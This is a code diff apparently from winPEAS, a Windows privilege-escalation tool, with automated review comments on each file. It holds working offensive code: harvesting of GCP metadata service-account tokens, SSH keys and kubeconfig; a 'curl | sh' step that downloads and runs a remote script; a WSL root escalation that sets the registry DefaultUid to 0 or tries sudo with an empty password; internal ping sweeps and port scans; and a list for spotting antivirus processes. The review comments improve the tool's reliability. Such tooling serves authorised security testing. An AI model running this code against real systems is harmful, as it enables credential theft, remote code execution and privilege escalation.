C:\Program Files\Google\Compute Engine\agent\GCEWindowsAgent.exe"
C:\Program Files\Google\OSConfig\google_osconfig_agent.exe"
c:\Program Files (x86)\Google\Cloud SDK"
http://metadata.google.internal
*/
public override bool IsCloud => Directory.Exists(GCP_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string METADATA_URL_BASE = "http://metadata.google.internal/computeMetadata/v1";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
_endpointData.Add("GC Project Info", GetGCProjectMetadataInfo());
_endpointData.Add("OSLogin Info", GetOSLoginMetadataInfo());
_endpointData.Add("Instance Info", GetInstanceMetadataInfo());
_endpointData.Add("Interfaces", GetInterfacesMetadataInfo());
_endpointData.Add("User Data", GetUserMetadataInfo());
_endpointData.Add("Service Accounts", GetServiceAccountsMetadataInfo());
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetServiceAccountsMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var serviceAccountsEndpointUrlBase = "instance/service-accounts";
var url = $"{METADATA_URL_BASE}/{serviceAccountsEndpointUrlBase}";
var serviceAccounts = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
// TODO
// echo " Name: $sa" - ignored for now
foreach (var serviceAccount in serviceAccounts.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Email", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}email", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Aliases", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}aliases", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Identity", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}identity", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Scopes", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}scopes", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Token", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}token", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetUserMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("startup-script", "instance/attributes/startup-script", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInterfacesMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var networkEndpointUrlBase = "instance/network-interfaces";
var url = $"{METADATA_URL_BASE}/{networkEndpointUrlBase}";
var ifaces = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
foreach (var iface in ifaces.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("IP", $"{networkEndpointUrlBase}/{iface}ip", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnetmask", $"{networkEndpointUrlBase}/{iface}subnetmask", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Gateway", $"{networkEndpointUrlBase}/{iface}gateway", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("DNS", $"{networkEndpointUrlBase}/{iface}dns-servers", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Network", $"{networkEndpointUrlBase}/{iface}network", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInstanceMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Description", "instance/description", false),
new Tuple<string, string, bool>("Hostname", "instance/hostname", false),
new Tuple<string, string, bool>("Instance ID", "instance/id", false),
new Tuple<string, string, bool>("Instance Image", "instance/image", false),
new Tuple<string, string, bool>("Machine Type", "instance/machine-type", false),
new Tuple<string, string, bool>("Instance Name", "instance/name", false),
new Tuple<string, string, bool>("Instance tags", "instance/scheduling/tags", false),
new Tuple<string, string, bool>("Zone", "instance/zone", false),
new Tuple<string, string, bool>("K8s Cluster Location", "instance/attributes/cluster-location", false),
new Tuple<string, string, bool>("K8s Cluster name", "instance/attributes/cluster-name", false),
new Tuple<string, string, bool>("K8s OSLoging enabled", "instance/attributes/enable-oslogin", false),
new Tuple<string, string, bool>("K8s Kube-labels", "instance/attributes/kube-labels", false),
new Tuple<string, string, bool>("K8s Kubeconfig", "instance/attributes/kubeconfig", false),
new Tuple<string, string, bool>("K8s Kube-env", "instance/attributes/kube-env", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetOSLoginMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("OSLogin users", "oslogin/users", false),
new Tuple<string, string, bool>("OSLogin Groups", "oslogin/groups", false),
new Tuple<string, string, bool>("OSLogin Security Keys", "oslogin/security-keys", false),
new Tuple<string, string, bool>("OSLogin Authorize", "oslogin/authorize", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetGCProjectMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Project-ID", "project/project-id", false),
new Tuple<string, string, bool>("Project Number", "project/numeric-project-id", false),
new Tuple<string, string, bool>("Project SSH-Keys", "project/attributes/ssh-keys", false),
new Tuple<string, string, bool>("All Project Attributes", "project/attributes/?recursive=true", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result?.Trim(),
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(GCP_BASE_URL, "GET") != null;
}
}
}
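Review bot: `GCP_BASE_URL = "http://{URL_BASE}/"` is not an interpolated string, so `TestConnection` requests the literal host `{URL_BASE}`; `WebRequest.CreateHttp` throws `UriFormatException`, the generic catch in `CreateMetadataAPIRequest` converts it to `string.Empty`, and `TestConnection` therefore returns true whenever `GCP_FOLDER` exists. Point it at `METADATA_URL_BASE` (or `http://metadata.google.internal/`). Also guard the `serviceAccounts.Trim()` and `ifaces.Trim()` calls, since the request returns null on connection failure; the `"Instance tags"` entry points at `instance/scheduling/tags`, but the documented metadata path is `instance/tags`; and the label `"K8s OSLoging enabled"` has a typo (`OSLogin`).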

View File

@ -0,0 +1,136 @@
using System;
using System.Diagnostics;
using System.Text;
using winPEAS.Helpers.Registry;
namespace winPEAS.Info.FilesInfo.WSL
{
public class WSLHelper
{
public static void RunLinpeas(string linpeasUrl)
{
string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh";
var cmd = CreateUnixCommand(linpeasCmd);
ExecuteCommand(cmd.Item1, cmd.Item2);
}
internal static Tuple<string, string> CreateUnixCommand(string command, string distributionName = null)
{
string wsl = Environment.Is64BitProcess
? "wsl.exe"
: Environment.GetEnvironmentVariable("WinDir") + "\\SysNative\\wsl.exe";
string distributionParam = !string.IsNullOrEmpty(distributionName)
? $"--distribution {distributionName}"
: string.Empty;
string args = $"{distributionParam} -- {command}";
return new Tuple<string, string>(wsl, args);
}
static string GetWSLUser(string distributionName)
{
string command = "whoami";
var cmd = CreateUnixCommand(command, distributionName);
var user = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2)?.Trim();
return user;
}
internal static string TryGetRootUser(string distributionName, string distributionGuid)
{
string hive = "HKCU";
string path = @$"SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\{distributionGuid}";
string key = "DefaultUid";
string wslUser = GetWSLUser(distributionName);
string exploit = $"change registry value: '{hive}\\{path}\\{key}' to 0";
string root = $"root ({exploit})";
if (string.Equals(wslUser, "root"))
{
return "root";
}
var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key);
var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
if (isValueChanged)
{
wslUser = GetWSLUser(distributionName);
if (string.Equals(wslUser, "root"))
{
RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
return root;
}
}
// try sudo without password
exploit = "sudo with empty password";
var cmd = CreateUnixCommand("echo -n '' | sudo -S su root -c whoami", distributionName);
var output = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2);
if (output == "root")
{
return $"root ({exploit})";
}
return wslUser;
}
private static string ExecuteCommandWaitForOutput(string cmd, string args)
{
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.FileName = cmd;
p.StartInfo.Arguments = args;
p.StartInfo.StandardOutputEncoding = Encoding.UTF8;
p.Start();
string output = p.StandardOutput.ReadToEnd()?.Trim();
p.WaitForExit();
return output;
}
private static void ExecuteCommand(
string command,
string args = null,
string workingFolder = null
)
{
var processStartInfo = new ProcessStartInfo
{
UseShellExecute = false,
Verb = "OPEN",
CreateNoWindow = true,
FileName = command,
WorkingDirectory = workingFolder,
Arguments = args,
RedirectStandardOutput = true,
RedirectStandardError = true,
StandardOutputEncoding = Encoding.UTF8
};
using (var process = Process.Start(processStartInfo))
{
if (process != null)
{
while (!process.StandardOutput.EndOfStream)
{
Console.WriteLine(process.StandardOutput.ReadLine());
}
while (!process.StandardError.EndOfStream)
{
Console.WriteLine(process.StandardError.ReadLine());
}
}
}
}
}
}
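Review bot: `TryGetRootUser` restores the original `DefaultUid` only on the success path: if `WriteRegValue` returns true but the second `GetWSLUser` does not come back as `root`, the method falls through to the sudo check and returns with the user's registry still modified. Restore in a `finally` (or right after the second `whoami`) regardless of the result. Related: `DefaultUid` under `Lxss\{guid}` is a REG_DWORD, while `WriteRegValue` writes `0.ToString()` as `RegistryValueKind.String`, which changes the value type and is not guaranteed to be honoured by WSL; and because this code changes state on the host it runs on, that side effect should be documented. `ExecuteCommandWaitForOutput` and `ExecuteCommand` redirect both stdout and stderr but drain them sequentially to end; a child that fills the stderr pipe while stdout is being read deadlocks, so use `BeginErrorReadLine` or redirect only the stream that is consumed. Finally, `RunLinpeas` pipes whatever `-linpeas=[url]` points at straight into `sh` with no integrity check, and `linpeasUrl` is inserted into the shell command line unquoted; at minimum quote the URL and mention in the help text that the option executes remote content.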

View File

@ -0,0 +1,56 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetPinger
{
private int PingTimeout = 1000;
public List<string> HostsAlive = new List<string>();
private List<string> ipRange = new List<string>();
public void AddRange(string baseIpAddress, string netmask)
{
var addresses = NetworkUtils.GetIPAddressesByNetmask(baseIpAddress, netmask).ToList();
var range = NetworkUtils.GetIPRange(IPAddress.Parse(addresses[0]), IPAddress.Parse(addresses[1]));
ipRange.AddRange(range);
}
public void AddRange(IEnumerable<string> ipAddressList)
{
ipRange.AddRange(ipAddressList);
}
public async Task RunPingSweepAsync()
{
var tasks = new List<Task>();
foreach (var ip in ipRange)
{
Ping p = new Ping();
var task = PingAndUpdateStatus(p, ip);
tasks.Add(task);
}
await Task.WhenAll(tasks);
}
private async Task PingAndUpdateStatus(Ping ping, string ip)
{
var reply = await ping.SendPingAsync(ip, PingTimeout);
if (reply.Status == IPStatus.Success)
{
HostsAlive.Add(ip);
await Console.Out.WriteLineAsync(ip);
}
}
}
}
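Review bot: HostsAlive is a plain List<string> that PingAndUpdateStatus appends to after an await, and RunPingSweepAsync starts every ping at once, so the continuations for different hosts run concurrently on the thread pool and race on the list (List<T> is not thread-safe; concurrent Add can corrupt it or drop entries). Use a ConcurrentBag<string> or lock around the Add. Each Ping is IDisposable and is never disposed; a `using` in PingAndUpdateStatus fixes that. AddRange(string, string) also takes addresses[0] and addresses[1] from GetIPAddressesByNetmask, which is called with filterUsable=false, so the network and broadcast addresses are included in the sweep.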

View File

@ -0,0 +1,93 @@
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using winPEAS.Helpers;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetworkScanner
{
enum ScanMode
{
Auto,
IPAddressList,
IPAddressNetmask,
}
private string[] ipAddressList;
private bool isAuto = false;
private ScanMode scanMode = ScanMode.IPAddressList;
private string baseAddress;
private string netmask;
IEnumerable<int> ports;
public NetworkScanner(string options, IEnumerable<int> ports = null)
{
/*
--network "auto" - find interfaces/hosts automatically
--network "10.10.10.10,10.10.10.20" - scan only selected ip address(es)
--network "10.10.10.10/24" - scan host based on ip address/netmask
*/
this.ports = ports;
if (string.Equals(options, "auto", StringComparison.InvariantCultureIgnoreCase))
{
scanMode = ScanMode.Auto;
}
else if (options.Contains("/"))
{
var parts = options.Split('/');
baseAddress = parts[0];
netmask = parts[1];
scanMode = ScanMode.IPAddressNetmask;
}
else
{
ipAddressList = options.Split(',');
scanMode = ScanMode.IPAddressList;
}
}
public void Scan()
{
try
{
Beaprint.GreatPrint("Scanning network (it might take some time)...");
List<string> aliveHosts = new List<string>();
NetPinger netPinger = new NetPinger();
if (scanMode == ScanMode.Auto)
{
// this is the "auto" mode
foreach (var ipAddressAndNetmask in NetworkUtils.GetInternalInterfaces())
{
netPinger.AddRange(ipAddressAndNetmask.Item1, ipAddressAndNetmask.Item2);
}
}
if (scanMode == ScanMode.IPAddressNetmask)
{
netPinger.AddRange(baseAddress, netmask);
}
else if (scanMode == ScanMode.IPAddressList)
{
netPinger.AddRange(ipAddressList);
}
var task = netPinger.RunPingSweepAsync();
task.Wait();
aliveHosts.AddRange(netPinger.HostsAlive);
PortScanner ps = new PortScanner(this.ports);
Parallel.ForEach(aliveHosts, host =>
{
ps.Start(host);
});
}
catch (Exception e)
{
Beaprint.PrintException(e.Message);
}
}
}
}
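Review bot: the catch block in Scan prints e.Message, but task.Wait() wraps any failure in an AggregateException whose Message is the generic "One or more errors occurred", so the real cause (for example a FormatException from an unparsable netmask) is hidden; unwrap it (`e is AggregateException ae ? ae.InnerException : e`) or make Scan async and await the sweep. The constructor does no validation of the `--network` value: an empty or malformed string goes straight into Split and on to the parsers. `isAuto` is assigned but never read. Finally, Parallel.ForEach over hosts, with PortScanner running another Parallel.ForEach over up to 1000 ports per host, has no MaxDegreeOfParallelism, so a /24 can open thousands of sockets at once; a ParallelOptions limit would keep the scan from exhausting handles.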

View File

@ -0,0 +1,221 @@
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal static class NetworkUtils
{
/// <summary>
/// IPAddress to UInteger
/// </summary>
/// <param name="ipAddress"></param>
/// <returns></returns>
public static uint IPToUInt(this string ipAddress)
{
if (string.IsNullOrEmpty(ipAddress))
return 0;
if (IPAddress.TryParse(ipAddress, out IPAddress ip))
{
var bytes = ip.GetAddressBytes();
Array.Reverse(bytes);
return BitConverter.ToUInt32(bytes, 0);
}
else
return 0;
}
/// <summary>
/// IP in Uinteger to string
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static string IPToString(this uint ipUInt)
{
return ToIPAddress(ipUInt).ToString();
}
/// <summary>
/// IP in Uinteger to IPAddress
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static IPAddress ToIPAddress(this uint ipUInt)
{
var bytes = BitConverter.GetBytes(ipUInt);
Array.Reverse(bytes);
return new IPAddress(bytes);
}
/// <summary>
/// First and Last IPv4 from IP + Mask
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// If ´filterUsable=false´ first IP is not usable and last is reserved for broadcast.
/// </remarks>
public static string[] GetIpRange(string ipv4, string mask, bool filterUsable)
{
uint[] uiIpRange = GetIpUintRange(ipv4, mask, filterUsable);
return Array.ConvertAll(uiIpRange, x => IPToString(x));
}
/// <summary>
/// First and Last IPv4 + Mask.
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// First IP is not usable and last is reserverd for broadcast.
/// Can use all IPs in between
/// </remarks>
public static uint[] GetIpUintRange(string ipv4, string mask, bool filterUsable)
{
uint sub;
//check if mask is CIDR Notation
if (mask.Contains("."))
{
sub = IPToUInt(mask);
}
else
{
sub = ~(0xffffffff >> Convert.ToInt32(mask));
}
uint ip2 = IPToUInt(ipv4);
uint first = ip2 & sub;
uint last = first | (0xffffffff & ~sub);
if (filterUsable)
{
first += 1;
last -= 1;
}
return new uint[] { first, last };
}
public static IEnumerable<string> GetIPRange(IPAddress startIP, IPAddress endIP)
{
uint sIP = ipToUint(startIP.GetAddressBytes());
uint eIP = ipToUint(endIP.GetAddressBytes());
while (sIP <= eIP)
{
yield return new IPAddress(reverseBytesArray(sIP)).ToString();
sIP++;
}
}
public static string CidrToNetmask(int cidr)
{
var nmask = 0xFFFFFFFF;
nmask <<= 32 - cidr;
byte[] bytes = BitConverter.GetBytes(nmask);
Array.Reverse(bytes);
nmask = BitConverter.ToUInt32(bytes, 0);
var netmask = new System.Net.IPAddress(nmask);
return netmask.ToString();
}
public static IEnumerable<string> GetIPAddressesByNetmask(string ipAddress, string netmask)
{
// TODO
// e.g.
// netmask should be e.g. 24 - currently we only support this format
string[] range = NetworkUtils.GetIpRange(ipAddress, netmask, false);
return range;
}
public static IEnumerable<string> GetHostsByIPAndNetmask(string ipAddressAndNetmask)
{
// TODO
// get hosts by ip address & netmask
// https://itecnote.com/tecnote/c-proper-way-to-scan-a-range-of-ip-addresses/
// we nned to (maybe in parallel)
// - ping e.g. 3 times
// - scan top 5 ports
var parts = ipAddressAndNetmask.Split(':');
return new List<string>
{
parts[0]
};
}
public static List<Tuple<string, string>> GetInternalInterfaces()
{
List<Tuple<string, string>> result = new List<Tuple<string, string>>();
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
{
if (ni.OperationalStatus == OperationalStatus.Up &&
(ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 || ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet))
{
// Console.WriteLine();
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
{
if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
{
// we need ip address and a netmask as well
result.Add(new Tuple<string, string>(ip.Address.ToString(), ip.IPv4Mask.ToString()));
}
}
}
}
return result;
}
/* Convert bytes array to 32 bit long value */
static uint ipToUint(byte[] ipBytes)
{
ByteConverter bConvert = new ByteConverter();
uint ipUint = 0;
int shift = 24; // indicates number of bits left for shifting
foreach (byte b in ipBytes)
{
if (ipUint == 0)
{
ipUint = (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
shift -= 8;
continue;
}
if (shift >= 8)
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
else
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint));
shift -= 8;
}
return ipUint;
}
/* reverse byte order in array */
private static uint reverseBytesArray(uint ip)
{
byte[] bytes = BitConverter.GetBytes(ip);
bytes = bytes.Reverse().ToArray();
return (uint)BitConverter.ToInt32(bytes, 0);
}
}
}
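Review bot: in GetIpUintRange the CIDR branch computes `sub = ~(0xffffffff >> Convert.ToInt32(mask))`, and C# masks a 32-bit shift count to 5 bits, so a prefix of 32 shifts by 0 and yields sub = 0, turning "10.10.10.10/32" into the range 0.0.0.0 to 255.255.255.255 (CidrToNetmask has the mirror-image problem with `nmask <<= 32 - cidr` when cidr is 0). Validate that the prefix is in 0..32 and compute the mask as `cidr == 0 ? 0 : 0xffffffffu << (32 - cidr)`. Relatedly, IPToUInt returns 0 for an unparsable address instead of failing, so a typo in the base address silently produces a sweep of 0.0.0.x. The comment in GetIPAddressesByNetmask saying only the "24" form is supported is stale: the dotted form is handled via mask.Contains(".") and is exactly what GetInternalInterfaces passes in. ipToUint/reverseBytesArray duplicate IPToUInt/ToIPAddress (and ByteConverter is unnecessary for a byte-to-uint widening), and GetHostsByIPAndNetmask is an unfinished TODO that nothing in this change calls; both can go.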

View File

@ -0,0 +1,122 @@
using System;
using System.Collections.Generic;
using System.Net.Sockets;
using System.Threading;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
class PortScanner
{
private int TcpTimeout = 500; // ms
#region nmap tcp top 1000
static List<int> nmapTop1000TCPPorts = new List<int>
{
1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,
179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,
548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,
902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,
1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,
1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,
1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,
1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,
1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,
1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,
2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,
2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,
2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,
3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,
3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,
4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,
5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,
5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,
5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,
6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,
7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,
8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,
8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,
9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,
10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,
14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,
19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,
32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,
44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,
50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,
64623,64680,65000,65129,65389
};
#endregion
private struct TcpPortState
{
public TcpClient MainClient { get; set; }
public bool IsTcpPortOpen { get; set; }
}
IEnumerable<int> portsToScan = nmapTop1000TCPPorts;
public PortScanner(IEnumerable<int> ports)
{
if (ports != null)
{
portsToScan = ports;
}
}
public void Start(string host)
{
Parallel.ForEach(portsToScan, port =>
{
RunScanTcp(host, port);
});
}
public void RunScanTcp(string host, int port)
{
Thread.Sleep(1);
var newClient = new TcpClient();
var state = new TcpPortState
{
MainClient = newClient,
IsTcpPortOpen = true
};
IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state);
state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);
if (state.IsTcpPortOpen == false || newClient.Connected == false)
{
return;
}
Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
}
void AsyncCallback(IAsyncResult asyncResult)
{
var state = (TcpPortState)asyncResult.AsyncState;
TcpClient client = state.MainClient;
try
{
client.EndConnect(asyncResult);
}
catch
{
return;
}
if (client.Connected && state.IsTcpPortOpen)
{
return;
}
client.Close();
}
}
}
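Review bot: TcpPortState is a struct, so the copy handed to BeginConnect is boxed inside the IAsyncResult and the later `state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false)` updates only the local copy; AsyncCallback therefore always sees IsTcpPortOpen == true and returns without closing a client whose connect completes after the timeout, and RunScanTcp never disposes a client that timed out or was refused either (EndConnect throws, the catch returns, nothing is closed), so a sweep of 1000 ports per host leaks TcpClient instances and their sockets. Make TcpPortState a class (or drop it and capture a shared flag) and close/dispose the client on every non-success path, for example with a finally block around the wait. BeginConnect can also throw synchronously (name resolution, unreachable address family) inside Parallel.ForEach, which then aborts the whole host scan as an AggregateException in the caller; a try/catch around the connect keeps one bad host from ending the run.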

View File

@ -4,664 +4,103 @@ namespace winPEAS.Info.ProcessInfo
{ {
static class DefensiveProcesses static class DefensiveProcesses
{ {
public static Dictionary<string, string> Definitions = new Dictionary<string, string>() private static Dictionary<string, HashSet<string>> Definitions = new Dictionary<string, HashSet<string>>()
{ {
{"mcshield.exe" , "McAfee AV"}, { "ALYac", new HashSet<string>() { "alyac.exe", "aylaunch.exe", "asmsetup.exe", } },
{"windefend.exe" , "Windows Defender AV"}, { "AVG Antivirus", new HashSet<string>() { "avgui.exe", } },
{"MSASCui.exe" , "Windows Defender AV"}, { "AVG", new HashSet<string>() { "avgemc.exe", "afwserv.exe", "avgsvc.exe", "aswidsagent.exe", } },
